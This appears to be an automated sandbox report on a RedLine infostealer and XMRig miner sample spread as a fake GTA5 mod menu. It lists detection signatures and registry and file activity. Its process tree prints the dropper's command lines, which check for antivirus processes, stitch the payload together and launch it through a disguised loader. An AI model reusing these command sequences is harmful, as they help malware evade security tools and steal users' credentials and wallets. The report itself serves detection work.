Malware Analysis Report

2025-03-15 04:56

Sample ID 240714-nhyvha1bnh
Target redirect
SHA256 6505e9b8af864023bb405d6e25d02e9853b128e1760dd87a64f920f697ac7db4
Tags
redline xmrig @mass1vexdd discovery execution infostealer miner persistence privilege_escalation spyware stealer
score
10/10

Analysis Overview

Threat Level: Known bad

The file redirect was found to be: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine

xmrig

RedLine payload

XMRig Miner payload

Downloads MZ/PE file

Reads user/profile data of web browsers

Event Triggered Execution: Component Object Model Hijacking

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Power Settings

Checks installed software on the system

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Views/modifies file attributes

Delays execution with timeout.exe

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Enumerates processes with tasklist

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

NTFS ADS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Opens file in notepad (likely ransom note)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 11:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 11:24

Reported

2024-07-14 12:09

Platform

win11-20240709-en

Max time kernel

2699s

Max time network

2644s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

RedLine payload

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\7z2407-x64.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Desktop\modest8\modest-menu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\ProgramData\Dllhost\winlogson.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_01cf530faf2f1752\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133654299032735122" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\mod-menu-gta5.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe:Zone.Identifier C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1144 wrote to memory of 1208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 1484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 2592 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1144 wrote to memory of 5032 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\redirect.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcad0dcc40,0x7ffcad0dcc4c,0x7ffcad0dcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1944 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1984 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2368 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3084 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3728,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3196 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5176,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5188 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4552,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=988 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5196,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4240 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5284,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5452,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5484 /prefetch:1

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=1432,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1428 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3152,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5576 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5340,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4448,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3212,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4400 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5516,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5504,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5632,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5720 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5832,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5332 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5772,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3772 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5844,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2164 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5372,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5716 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5184,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5488,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3120,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4488 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3224 /prefetch:8

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6264,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6580,i,12061027323897384990,5760042600934854057,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=6564 /prefetch:1

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe"

C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe

"C:\Users\Admin\AppData\Local\Temp\7zO8C0CB02E\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\Desktop\modest8\modest-menu.exe

"C:\Users\Admin\Desktop\modest8\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\system32\NOTEPAD.EXE

